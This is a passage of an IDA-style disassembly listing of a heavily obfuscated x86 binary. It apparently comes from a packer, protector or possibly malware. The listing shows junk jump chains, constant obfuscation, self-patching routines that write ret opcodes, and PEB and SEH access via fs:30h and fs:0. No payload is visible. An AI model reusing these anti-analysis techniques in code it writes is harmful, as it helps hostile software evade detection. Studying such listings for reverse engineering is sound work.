loc_43FA1D:				; CODE XREF: sub_45482D+Dj
		jmp	loc_4579F6
; END OF FUNCTION CHUNK	FOR sub_45482D
; ---------------------------------------------------------------------------

loc_43FA22:				; CODE XREF: k2vbe3.d:0044845Cj
		jmp	locret_456987
; ---------------------------------------------------------------------------

loc_43FA27:				; CODE XREF: k2vbe3.d:0044746Aj
		jmp	loc_45685D

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43FA2C	proc near		; CODE XREF: k2vbe3.d:00442231p
					; sub_449DA2+FD84p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440907 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004414E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441778 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441AD9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443B0B SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044F1ED SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00451883 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00454652 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045876C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A80B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045BC73 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045BC8E SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+4+var_4]
		mov	esp, ebp
		jmp	loc_443B0B
sub_43FA2C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43FA3C:				; CODE XREF: k2vbe3.d:004504C6j
		mov	ecx, eax
		xchg	ecx, [esp]
		push	0C91BDE8Eh
		pop	eax
		rol	eax, 12h
		add	eax, 8609B906h
		jmp	loc_44DD6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_43FA55:				; CODE XREF: sub_4553CC-17E9j
		or	edi, eax
		cmp	ecx, 0A346D466h
		jmp	loc_4490A5
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
		dw 3B02h
dword_43FA64	dd 0FA8EC4EEh		; DATA XREF: sub_441172+4r
					; sub_44B208+3DA3r ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_43FA68:				; CODE XREF: sub_44B979+5AA5j
		jmp	loc_440726
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
		db 63h,	0ABh, 0FDh
dword_43FA70	dd 32B3BF4h		; DATA XREF: k2vbe3.d:0043E322w
					; sub_44AD44+8r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_43FA74:				; CODE XREF: sub_4505F8-1356Dj
		jmp	loc_43EAFE
; END OF FUNCTION CHUNK	FOR sub_4505F8
; ---------------------------------------------------------------------------
		db 97h,	27h, 3Eh
dword_43FA7C	dd 153970h		; DATA XREF: sub_4424CF-1DFBr
					; sub_44D298-C771r ...
; ---------------------------------------------------------------------------

loc_43FA80:				; CODE XREF: k2vbe3.d:0045836Bj
		jmp	loc_448428
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_43FA85:				; CODE XREF: k2vbe3.d:loc_44FEE7j
					; sub_452D37+26Ej
		jmp	loc_44041F
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BECA

loc_43FA8A:				; CODE XREF: sub_44BECA+4AEDj
		jmp	loc_442AEA
; END OF FUNCTION CHUNK	FOR sub_44BECA
; ---------------------------------------------------------------------------
		db 81h
dword_43FA90	dd 3BCB1BBFh		; DATA XREF: sub_4570C0-18134w
					; sub_4570C0-14C0Ar ...
dword_43FA94	dd 0			; DATA XREF: sub_440D7B-61Bw
					; sub_44B999-5AFw ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_43FA98:				; CODE XREF: sub_44128B+1AE2Fj
		jmp	nullsub_452
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------

loc_43FA9D:				; CODE XREF: k2vbe3.d:0044893Fj
		jmp	locret_43DB0D
; ---------------------------------------------------------------------------
		dw 8C86h
dword_43FAA4	dd 0			; DATA XREF: sub_459DA3:loc_457189r
					; sub_4460FD+119E2w
dword_43FAA8	dd 0			; DATA XREF: sub_44BB73-E8DBr
; ---------------------------------------------------------------------------

loc_43FAAC:				; CODE XREF: k2vbe3.d:00444AC6j
		jmp	locret_45C1C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_43FAB1:				; CODE XREF: sub_44128B:loc_43C5A4j
					; sub_457D4B-1B790j
		xor	eax, 0F3E3F98Eh
		test	eax, 40000h
		jmp	loc_4523F1
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------

loc_43FAC2:				; CODE XREF: k2vbe3.d:00444B9Bj
		ja	loc_44799C

loc_43FAC8:				; CODE XREF: k2vbe3.d:004453D3j
		sub	ecx, 205172F2h
		add	ecx, 837593D4h
		xchg	ecx, [esp]
		jmp	sub_4436CE
; ---------------------------------------------------------------------------

loc_43FADC:				; CODE XREF: k2vbe3.d:loc_459524j
		js	loc_44ACBB

; =============== S U B	R O U T	I N E =======================================



sub_43FAE2	proc near		; CODE XREF: sub_43C745+1D9C2p

; FUNCTION CHUNK AT 0043C007 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443976 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452C8E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455689 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045A650 SIZE 00000017 BYTES

		xchg	edx, [esp+0]
		pop	edx
		cmp	eax, [ebp-0Ch]
		ja	loc_45A650

loc_43FAEF:				; CODE XREF: sub_44C90E:loc_44A4BFj
					; sub_43C745+16DA3j
		cmp	dword ptr [ebp-8], 0A22F8A70h
		jz	loc_452C93
		mov	eax, [ebp-0Ch]
		jmp	loc_443976
sub_43FAE2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_43FB04:				; CODE XREF: sub_44471B:loc_43C524j
		mov	edi, edx
		xchg	edi, [esp+0]
		push	edi
		push	0CC9289Bh
		pop	edi
		rol	edi, 8
		jmp	loc_443097
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_43FB18:				; CODE XREF: sub_4570C0:loc_454045j
		pop	edx
		and	edx, 6D68CB6Ah
		sub	edx, 2E9863CBh
		add	edx, 0E17CD2E1h

loc_43FB2B:				; CODE XREF: sub_449372:loc_43F097j
		jmp	loc_44C4D7
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------
		mov	[ebp+0], ecx
		jmp	sub_43DCD0
; ---------------------------------------------------------------------------
		mov	eax, 3CC6743Ch
		push	ecx
		push	34F805Eh
		pop	ecx
		jmp	loc_44CA80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_43FB49:				; CODE XREF: sub_44469A:loc_448750j
					; k2vbe3.d:00448763j
		sub	edx, 248E2B48h

loc_43FB4F:				; CODE XREF: k2vbe3.d:loc_459A7Bj
					; sub_44128B:loc_45C0A5j
		xor	edx, 4D55EE19h
		add	edx, ebp
		add	edx, 0D324C55Ch
		mov	edx, [edx]
		jmp	loc_4490E6
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44990B

loc_43FB64:				; CODE XREF: sub_44990B+8j
		call	sub_447383

loc_43FB69:				; CODE XREF: k2vbe3.d:0044E24Ej
		jmp	nullsub_54
; END OF FUNCTION CHUNK	FOR sub_44990B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_43FB6E:				; CODE XREF: sub_44E0F6-BB11j
		jmp	nullsub_156
; END OF FUNCTION CHUNK	FOR sub_44E0F6

; =============== S U B	R O U T	I N E =======================================



sub_43FB73	proc near		; DATA XREF: sub_4580DF:loc_454BABo

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0044DBEA SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E1FA SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00454946 SIZE 00000005 BYTES

		push	dword ptr [ebp+10h]
		push	esi
		push	7B0259DFh
		pop	esi
		xor	esi, 3E79E99h
		jmp	loc_454946
sub_43FB73	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jno	loc_447D3F
		mov	edi, edx
		jmp	sub_45BE5C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441109

loc_43FB95:				; CODE XREF: sub_441109:loc_43D500j
		cmp	eax, 7C61090Eh
		retn
; END OF FUNCTION CHUNK	FOR sub_441109

; =============== S U B	R O U T	I N E =======================================



sub_43FB9B	proc near		; CODE XREF: sub_44866A+3B7Ep
					; k2vbe3.d:00458C37p

; FUNCTION CHUNK AT 0043EEDF SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044308C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044859B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450864 SIZE 00000015 BYTES

		xor	bx, bx
		add	ebx, 10000h
		jmp	loc_450864
sub_43FB9B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CE6

loc_43FBA9:				; CODE XREF: sub_446CE6-A84Fj
		jnp	loc_441D9B
		adc	edx, 0E07AA7F6h
		jmp	loc_456588
; END OF FUNCTION CHUNK	FOR sub_446CE6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_126. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_43FBBB:				; CODE XREF: sub_452D37-70B7j
		jmp	loc_44B1F8
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_43FBC0:				; CODE XREF: sub_444966-42CAj
		jmp	loc_4521E6
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_43FBC5:				; CODE XREF: sub_44B94B:loc_459418j
		jnz	loc_4465FA
		jmp	loc_44D2EC
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_43FBD0:				; CODE XREF: k2vbe3.d:0045A7A0j
		jle	loc_45908E
		adc	eax, 79287D4Ah
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_43FBDC:				; CODE XREF: sub_454E83+5910j
		add	eax, 20148654h
		popf
		push	offset loc_43D77E
		jmp	nullsub_459
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_43FBED:				; CODE XREF: sub_44B999-8A88j
		jnp	loc_43EE06
		pushf

loc_43FBF4:				; CODE XREF: sub_44B999:loc_44FD96j
		call	sub_4436CE
		mov	edx, 0D504D785h

loc_43FBFE:				; CODE XREF: k2vbe3.d:0043E7DBj
		call	sub_45B20A
		push	ecx
		jmp	loc_44B3E2
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43FC09:				; CODE XREF: sub_44C90E+34C0j
		xor	eax, ds:4000F2h
		jnz	loc_43CD15

loc_43FC15:				; CODE XREF: k2vbe3.d:0043CFF1j
		jmp	loc_450C43
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		test	ebx, 0DE0F4DFDh
		jmp	loc_43E1A8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_377. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_43FC26:				; CODE XREF: sub_456666-1179Cj
		jmp	loc_44A2C4
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_43FC2B:				; CODE XREF: sub_44E0F6-FA4Aj
		push	0B9970B5Ah
		not	edx
		mov	ebp, esi

loc_43FC34:				; CODE XREF: sub_44E0F6:loc_45247Cj
		call	sub_4436CE
		push	2AC6946Ch
		pop	edx
		rol	edx, 12h
		sub	edx, 8D45B1DDh
		jmp	loc_443505
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_43FC4D:				; CODE XREF: sub_44D0D5+E8A8j
		push	edx
		push	40163191h
		pop	edx
		or	edx, 0F3271388h
		jmp	loc_44F4E4
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------

loc_43FC5F:				; CODE XREF: k2vbe3.d:0044B03Aj
		test	ecx, 0BB135F12h
		jmp	loc_44275F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_43FC6A:				; CODE XREF: sub_45762D:loc_440B91j
		push	400h
		mov	eax, [ebp-8]
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+8+var_8]
		mov	eax, [ebp-30h]
		jmp	loc_455824
; END OF FUNCTION CHUNK	FOR sub_45762D
; ---------------------------------------------------------------------------

loc_43FC80:				; CODE XREF: k2vbe3.d:0045B2AAj
		push	offset sub_44AE1C
		jmp	locret_443BED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A0D7

loc_43FC8A:				; CODE XREF: sub_44A0D7-8226j
		not	ecx
		jmp	loc_44DE55
; END OF FUNCTION CHUNK	FOR sub_44A0D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_43FC91:				; CODE XREF: sub_4553CC:loc_43EF2Ej
		cmp	dword ptr [ebp-4], 7
		jnz	loc_445384
		jmp	loc_43D9D5
; END OF FUNCTION CHUNK	FOR sub_4553CC

; =============== S U B	R O U T	I N E =======================================



sub_43FCA0	proc near		; CODE XREF: sub_43CDCB+8p
					; k2vbe3.d:00458D9Fj

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043D3F6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443A8B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448572 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C42B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EE72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EFC3 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044FB3A SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004506D4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00451CE5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00453BC9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459F35 SIZE 0000001F BYTES

		xchg	esi, [esp+0]
		pop	esi
		pop	edx

loc_43FCA5:				; CODE XREF: k2vbe3.d:0044928Ej
		jz	loc_44EFC3
		jmp	loc_43DB66
sub_43FCA0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		or	edi, ebp
		jmp	loc_4551AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FECA

loc_43FCB7:				; CODE XREF: sub_43FECA:loc_44C13Ej
		jz	loc_4568A5
		jmp	loc_441F12
; END OF FUNCTION CHUNK	FOR sub_43FECA
; ---------------------------------------------------------------------------
		mov	[edx], ebp
		jmp	sub_45783B
; ---------------------------------------------------------------------------

loc_43FCC9:				; CODE XREF: k2vbe3.d:loc_450E73j
		jnz	loc_44EA02
		jmp	loc_440582
; ---------------------------------------------------------------------------

loc_43FCD4:				; DATA XREF: sub_43D98C+1324Eo
		pop	ecx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_43FCD7:				; CODE XREF: k2vbe3.d:00449BD4j
		jmp	loc_449573
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D98C

loc_43FCDC:				; CODE XREF: k2vbe3.d:0043D97Aj
					; sub_43D98C:loc_4427E1j
		xor	eax, eax
		mov	[ebp+var_8], eax
		jmp	loc_450BD6
; END OF FUNCTION CHUNK	FOR sub_43D98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_43FCE6:				; CODE XREF: sub_44416D+7B59j
		test	byte ptr [ebp-8], 8
		jz	loc_459445
		push	ebp
		jmp	loc_44087D
; END OF FUNCTION CHUNK	FOR sub_44416D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447266

loc_43FCF6:				; CODE XREF: sub_447266+A0E5j
		jo	loc_43CED2

loc_43FCFC:				; CODE XREF: sub_447266:loc_45A910j
		and	ebx, 775B259Bh
		sub	ebx, ds:4000EBh
		add	ebx, 4A960D6Bh

loc_43FD0E:				; CODE XREF: k2vbe3.d:loc_444D75j
		popf
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_44C143
; END OF FUNCTION CHUNK	FOR sub_447266
; ---------------------------------------------------------------------------

loc_43FD17:				; CODE XREF: k2vbe3.d:0043F644j
		pop	esi
		lea	eax, sub_446258

loc_43FD1E:				; CODE XREF: k2vbe3.d:0045480Aj
		mov	byte ptr [eax],	0C3h
		jmp	sub_446258

; =============== S U B	R O U T	I N E =======================================



sub_43FD26	proc near		; CODE XREF: sub_41A84D+1Ep
					; sub_43FD26+5j
					; DATA XREF: ...
		call	sub_4545C4
		jmp	ds:off_41E044
sub_43FD26	endp

; ---------------------------------------------------------------------------

locret_43FD31:				; CODE XREF: k2vbe3.d:loc_440480j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EFC9

loc_43FD32:				; CODE XREF: sub_43EFC9+1461Ej
		jmp	loc_43FF10
; END OF FUNCTION CHUNK	FOR sub_43EFC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F42B

loc_43FD37:				; CODE XREF: sub_43DFE1:loc_44F742j
					; sub_44F42B+81A9j
		pushf
		sub	ebp, 380B98FFh
		and	eax, edi
		jmp	loc_43C568
; END OF FUNCTION CHUNK	FOR sub_44F42B
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_43FD46:				; CODE XREF: sub_44921C+BF56j
		jmp	loc_44878C
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		push	ecx
		jno	loc_440960
		inc	ds:dword_44BCF8
		lea	eax, nullsub_11
		mov	byte ptr [eax],	0C3h
		jmp	loc_44D42D
; ---------------------------------------------------------------------------
		mov	[eax], ebx
		jns	loc_459895
		jmp	sub_44B58F
; ---------------------------------------------------------------------------
		ror	edi, 17h
		jmp	sub_45971A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BF01

loc_43FD7E:				; CODE XREF: sub_45BF01+17j
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		nop
		push	offset sub_44A28D
		jmp	nullsub_445
; END OF FUNCTION CHUNK	FOR sub_45BF01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_43FD8F:				; CODE XREF: sub_44F028-1159Cj
		shr	ecx, 10h

loc_43FD92:				; CODE XREF: k2vbe3.d:loc_452B60j
					; k2vbe3.d:loc_457DDCj
		lea	eax, [ebp-2AAh]
		push	offset sub_446E24
		jmp	loc_451F1D
; END OF FUNCTION CHUNK	FOR sub_44F028

; =============== S U B	R O U T	I N E =======================================



sub_43FDA2	proc near		; CODE XREF: sub_445EB0:loc_43DB0Ep
					; sub_445EB0:loc_455A6Aj
		push	large dword ptr	fs:0
		mov	large fs:0, esp

loc_43FDB0:				; CODE XREF: k2vbe3.d:loc_44BF25j
		mov	eax, large fs:20h

loc_43FDB7:				; CODE XREF: sub_45B20A:loc_452215j
		push	offset loc_450170
		jmp	nullsub_25
sub_43FDA2	endp


; =============== S U B	R O U T	I N E =======================================



sub_43FDC1	proc near		; DATA XREF: sub_444DA9-644Fo

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 004432E8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044386D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446792 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00451775 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451BF5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453549 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00458F74 SIZE 00000011 BYTES

		mov	eax, ds:dword_44DA58
		or	eax, eax
		jnz	loc_446792
		jmp	loc_4432E8
sub_43FDC1	endp

; ---------------------------------------------------------------------------
		sub	ebp, 409907C8h
		jmp	sub_44001D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43FDDF:				; CODE XREF: sub_45A323:loc_45A360j
		push	offset sub_443A3B
; END OF FUNCTION CHUNK	FOR sub_45A323
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_43FDE4:				; CODE XREF: sub_45101A:loc_443A78j
		jmp	nullsub_303
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_43FDE9:				; CODE XREF: sub_445124+3840j
		jge	loc_459F90
		push	0C4CC34D5h
		jl	loc_449BE9
		jmp	loc_459F8E
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_43FDFF:				; CODE XREF: sub_44CA34:loc_4427B5j
		jz	loc_45AF37
		jmp	loc_441946
; END OF FUNCTION CHUNK	FOR sub_44CA34

; =============== S U B	R O U T	I N E =======================================



sub_43FE0A	proc near		; CODE XREF: sub_4402FAp
					; k2vbe3.d:00450BADj

; FUNCTION CHUNK AT 0043C3F8 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043CE0F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441DFB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00441E4C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441FE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443443 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004436C6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00447ED1 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044BD9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450264 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00452324 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00452A4D SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00457B78 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045C258 SIZE 0000000A BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		jmp	loc_447ED1
sub_43FE0A	endp


; =============== S U B	R O U T	I N E =======================================



sub_43FE19	proc near		; CODE XREF: sub_458A60-789Dj
					; sub_458A60:loc_45B16Dj

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		lea	eax, dword_447994
		jmp	loc_43C5AA
sub_43FE19	endp


; =============== S U B	R O U T	I N E =======================================



sub_43FE2A	proc near		; CODE XREF: sub_4407B5+4p

; FUNCTION CHUNK AT 0043D3A0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043ED71 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00440219 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00440597 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00442FDC SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00446F02 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004475B4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447D80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449DB0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00449FDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450792 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00458E38 SIZE 00000010 BYTES

		push	ebx
		push	ecx
		mov	eax, large fs:30h
		mov	eax, [eax+0Ch]
		jmp	loc_447D80
sub_43FE2A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_43FE3B:				; CODE XREF: sub_43DA1E+14j
		rol	ebx, 4
		or	ebx, 853A9ED1h
		add	ebx, 1A450103h
		test	eax, ebx
		pop	ebx
		jz	loc_443D4E
		jmp	loc_4544BE
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_91. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442D04

loc_43FE59:				; CODE XREF: sub_442D04+1j
		mov	ebp, esp
		push	ecx
		push	edi
		push	0CA82A2EFh
		pop	edi
		jmp	loc_45B0A1
; END OF FUNCTION CHUNK	FOR sub_442D04
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_43FE68:				; CODE XREF: sub_44945C+8271j
		push	eax
		mov	edx, eax
		call	sub_45B74D

loc_43FE70:				; CODE XREF: sub_443A3B+5j
		push	edx
		push	0EE2DAA51h
		pop	edx
		and	edx, 0C78C965Ah
		xor	edx, 0B673D07Eh
		jmp	loc_43CB2B
; END OF FUNCTION CHUNK	FOR sub_44945C

; =============== S U B	R O U T	I N E =======================================



sub_43FE88	proc near		; CODE XREF: sub_454463-87C2j

var_4		= dword	ptr -4

		push	ebx
		push	0DDAB6518h
		pop	ebx
		and	ebx, 0CD3E4D3Fh
		add	ebx, 331A346Fh
		xchg	ebx, [esp+4+var_4]
		jmp	sub_45B20A
sub_43FE88	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_43FEA3:				; CODE XREF: sub_446258+11F63j
		pop	ebp
		xchg	ebp, [esp+4+var_4]
		call	sub_44367E
		mov	eax, 729645CDh
		push	edi
		push	0C720CBC3h
		pop	edi
		add	edi, 99DBF9D3h
		jmp	loc_44B577
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
		adc	esi, edx
		jmp	sub_452719

; =============== S U B	R O U T	I N E =======================================



sub_43FECA	proc near		; CODE XREF: k2vbe3.d:0043EEBCp
					; k2vbe3.d:004454BFj

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043D4D3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043FCB7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441F12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B79A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C13E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452170 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452777 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004568A5 SIZE 00000013 BYTES

		xchg	edx, [esp+0]
		pop	edx
		or	edx, edx
		jnz	loc_43D4D3
		jmp	loc_44C13E
sub_43FECA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA63

loc_43FEDB:				; CODE XREF: sub_45AA63:loc_44D585j
		add	ebx, 12989469h
		sub	ebx, 0E19EE486h
		add	ebx, 0EDC2E8C1h
		xchg	ebx, [esp+0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_45AA63
; ---------------------------------------------------------------------------

loc_43FEF5:				; CODE XREF: k2vbe3.d:00452F97j
		shl	ebx, 1Eh

; =============== S U B	R O U T	I N E =======================================



sub_43FEF8	proc near		; CODE XREF: sub_442053+163BEp

; FUNCTION CHUNK AT 0044157D SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		cmp	dword ptr [eax+3Ch], 0
		jmp	loc_44157D
sub_43FEF8	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_44. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_43FF06:				; CODE XREF: sub_44D298-241j
		jmp	loc_450B71
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------

loc_43FF0B:				; CODE XREF: k2vbe3.d:0043D8F3j
		jmp	loc_43CA3A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EFC9

loc_43FF10:				; CODE XREF: sub_43EFC9:loc_43FD32j
		lea	eax, nullsub_18
		mov	byte ptr [eax],	0C3h
		jmp	loc_451DBD
; END OF FUNCTION CHUNK	FOR sub_43EFC9
; ---------------------------------------------------------------------------
		call	nullsub_498

loc_43FF23:				; CODE XREF: k2vbe3.d:004432BAj
		jmp	ds:dword_41E190
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447266

loc_43FF29:				; CODE XREF: sub_447266+18j
		jmp	loc_45A910
; END OF FUNCTION CHUNK	FOR sub_447266
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_43FF2E:				; CODE XREF: sub_43F2E0+3DA7j
